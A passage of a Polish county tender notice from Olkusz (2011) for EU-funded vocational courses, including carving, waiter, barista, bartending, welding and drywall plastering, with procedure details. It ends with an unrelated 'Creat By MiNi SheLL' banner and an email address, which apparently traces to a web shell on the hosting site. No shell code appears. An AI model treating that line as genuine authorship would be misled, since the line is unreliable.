<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy w poniższym zakresie:
a) łączne wynagrodzenie Wykonawcy za przeprowadzenie kursu może ulec zmniejszeniu: 
- w przypadku zmniejszenia ilości uczestników określonego kursu Wykonawca otrzyma wynagrodzenie zmniejszone proporcjonalnie do zmniejszonej ilości uczestników kursu, przy czym wskazana w ofercie cena brutto kursu dla 1 uczestnika jest stała i nie ulega zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp.olkusz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Olkuszu, ul. Mickiewicza 2, 32-300 Olkusz- pokój nr 92.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2011 godzina 11:00, miejsce: Starostwo Powiatowe w Olkuszu, ul. Mickiewicza 2, 32-300 Olkusz- pokój nr 41.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Modernizacja Kształcenia Zawodowego w Małopolsce współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Carving - szkolenie grupowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Carving - szkolenie grupowe
I.1 Liczba uczestników - 2 grupy nie większe niż 7 osób w każdej.
I.2 Kurs Carvingu - szkolenie grupowe w wymiarze co najmniej 8 godzin.
Program kursu powinien obejmować co najmniej zagadnienia:
-historia sztuki carvingu 
-narzędzia do carvingu: typy, rodzaje, sposoby używania i konserwacji 
-sposoby zabezpieczania i pielęgnacji wyrzeźbionych prac 
-rzeźbienie takich jak: arbuz, melon, dynia, burak, kalarepa, rzodkiew, ogórek, cukinia, marchew i inne 
-tworzenie dekoracji sztuki carvingu poprzez łączenie pojedynczych rzeźb (tworzenie kompozycji przestrzennej) 
 I.3 Metody pracy:
-zajęcia teoretyczne ograniczone do minimum
-ćwiczenia praktyczne
Wykonawca jest zobowiązany do zapewnienia każdemu uczestnikowi kursu kompletu noży do carvingu, które po zakończeniu kursu zostaną własnością kursanta.
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> kurs kelnerski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs kelnerski

II.1 Liczba uczestników: 10 osób - 1 grupa.
II. 2 Kurs kelnerski w wymiarze co najmniej 32 godzin (spotkania maksymalnie 8 godzinne w weekendy lub inne dni wolne).
Program kursu powinien obejmować co najmniej zagadnienia:
1.Przygotowanie do pracy
2.Techniki kelnerskie
3.Podstawowe informacje nt. kawy i napojów kawowych, w tym obsługa ekspresu ciśnieniowego i sposoby przygotowywania
4.Pojęcie aperitif i degestif - zasady i przykłady zastosowania
5.Zasady obsługi gości
6.Napoje i alkohole - rozróżnianie i sposoby podawania ze szczególnym uwzględnieniem win (nazwy, rodzaje, umiejętność doboru do potraw, etykiety win)
7.Obsługa klienta na różnych etapach - od powitania do pożegnania

II.3 Metody pracy:
-zajęcia teoretyczne ograniczone do minimum
-ćwiczenia praktyczne
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> kurs manager restauracji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs manager restauracji
III.1 Liczba uczestników: 3 osoby
III.2 Kurs manager restauracji w wymiarze co najmniej 64 godziny (spotkania maksymalnie  8 godzin dziennie w weekendy lub w dni wolne). Program kursu powinien obejmować co najmniej zagadnienia:
1.Obowiązki managera restauracji
2.Elementy zarządzania
3.Specyfika zarządzania restauracją
4.Rekrutacja pracowników
5.Organizacja pracy serwisu kelnerskiego oraz pracy w barze
6.Typologia alkoholi, miksologia, enologia
7.Obsługa konsumenta
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy
W związku z niewielką liczbą uczestników kursu Zamawiający dopuszcza włączenie kursantów do grupy spoza niniejszego zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warsztat baristyczny/ art-latte.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztat baristyczny/art latte
IV.1 Liczba uczestników: 2 osoby  IV.2 Kurs baristyczny z elementami art latte w wymiarze minimum 8 godzin.
Program kursu powinien obejmować co najmniej zagadnienia:
1.	Podstawy teoretyczne (zarys historyczny, odmiany kawy, regiony uprawy, sposoby przetwarzania i palenia, najważniejsze metody przyrządzania i serwowania napojów kawowych)
2.	Zajęcia praktyczne: 
-Obsługa ekspresu ciśnieniowego
-Espresso
-Kawy mleczne
-Kawy deserowe
-Art latte
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy
IV.3 Metody pracy:
-zajęcia teoretyczne ograniczone do minimum
-ćwiczenia praktyczne
W związku z niewielką liczbą uczestników kursu Zamawiający dopuszcza włączenie kursantów do grupy spoza niniejszego zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs barmański.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs barmański
V.1. Liczba uczestników - 8 osób - 1grupa
V.2 Kurs barmański w wymiarze co najmniej 32 godziny.
Program kursu powinien obejmować co najmniej:
1.Klasyfikację alkoholi
2.Naczynia i przyrządy niezbędne do pracy barmana
3.Podział alkoholi
4.Techniki przygotowywania drinków
5.Sporządzanie drinków z różnych rodzajów alkoholi
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy
V.3. Metody pracy
-zajęcia teoretyczne ograniczone do minimum
-ćwiczenia praktyczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> kurs kelnerski dostosowany do potrzeb młodzieży uczęszczającej do szkoły specjalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs kelnerski dostosowany do potrzeb uczniów kształcących się w szkole specjalnej
VI.1 Liczba uczestników: 10 osób - 1 grupa
VI. 2 Kurs kelnerski w wymiarze co najmniej 32 godzin (spotkania maksymalnie 5 godzinne w weekendy lub inne dni wolne)
Program kursu powinien obejmować co najmniej zagadnienia:
1.Przygotowanie do pracy
2.Techniki kelnerskie
3.Podstawowe informacje nt. kawy i napojów kawowych, w tym obsługa ekspresu ciśnieniowego i sposoby przygotowywania
4.Pojęcie aperitif i degestif - zasady i przykłady zastosowania
5.Zasady obsługi gości
6.Napoje i alkohole - rozróżnianie i sposoby podawania ze szczególnym uwzględnieniem win (nazwy, rodzaje, umiejętność doboru do potraw, etykiety win)
7.Obsługa klienta na różnych etapach - od powitania do pożegnania

VI.3 Metody pracy:
-zajęcia teoretyczne ograniczone do minimum
-ćwiczenia praktyczne
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć  50 minut zajęć  + 10 minut przerwy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs spawacza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kurs spawacza metodą MAG - 135
VII.1 Liczba uczestników - 30 osób (min 2 grupy, max.  15 osobowe)
VII.2 Kurs spawacza metodą MAG - 135 - spawanie łukowe elektrodą topliwą                     w osłonie gazu aktywnego blach i rur spoinami pachwinowymi, w wymiarze co najmniej 148 godzin
Program kursu powinien obejmować elementy:
Program kursu powinien być oparty na  programach Międzynarodowego Instytutu Spawalnictwa i Europejskiej Federacji Spawalniczej lub programach własnych Instytutu Spawalnictwa (zgodny z wytycznymi Instytutu Spawalnictwa: W-07/IS-02.) Program powinien pozwolić na podejście do egzaminu zewnętrznego.
VII.3 Metody pracy:
-zajęcia teoretyczne 
-zajęcia praktyczne - co najmniej 100 godzin.
Zamawiający wymaga pokrycia kosztów badań lekarskich dla każdego z kursantów niezbędnych przy ubieganiu się o uzyskanie stosownych uprawnień oraz pokrycia kosztów jednokrotnego egzaminu dla każdego z kursantów, po zdaniu którego uczestnicy otrzymują książeczkę spawacza, Świadectwo Egzaminu Kwalifikacyjnego Spawacza.
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć   50 minut zajęć  + 10 minut przerwy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Bezpyłowe tynki gipsowe typu multi finisz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bezpyłowe tynki gipsowe typu multi-finish
VIII.1 Liczba uczestników - 12 osób - 1 grupa
VIII.2 Kurs bezpyłowe tynki gipsowe typu multi-finish, w wymiarze co najmniej 32 godziny
 Program kursu powinien obejmować co najmniej następujące elementy:
-Właściwości gipsu i jego zastosowanie jako materiału budowlanego
-Rodzaje płyt do systemów suchej zabudowy
-Omówienie i prezentacja podstawowych konstrukcji systemów suchej zabudowy (ściany działowe, sufity podwieszane, suchy tynk, okładziny ścian).
-Poprawność wykonawstwa konstrukcji z płyt GK (właściwy dobór materiałów, utrzymanie reżimu technologicznego, zabezpieczenie przed pęknięciami, wykonawstwo szczegółów).
-Technologie szpachlowania styków płyt GK. 
-Podstawowe wiadomości z zakresu ogniochronności elementów budowlanych.
-Poprawne wykonanie konstrukcji ogniochronnych z płyt GK i z płyty Fireboard
(warunki, zalecenia, szczegóły). 
-Naprawa usterek, eliminacja błędów wykonawczych. 
-Konstrukcje nietypowe (obudowy z płyt GK z ołowiem w pomieszczeniach RTG, sufity akustyczne, podłogi techniczne - podnoszone). 
-Przygotowanie podłoża - masy samopoziomujace i środki gruntujące
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com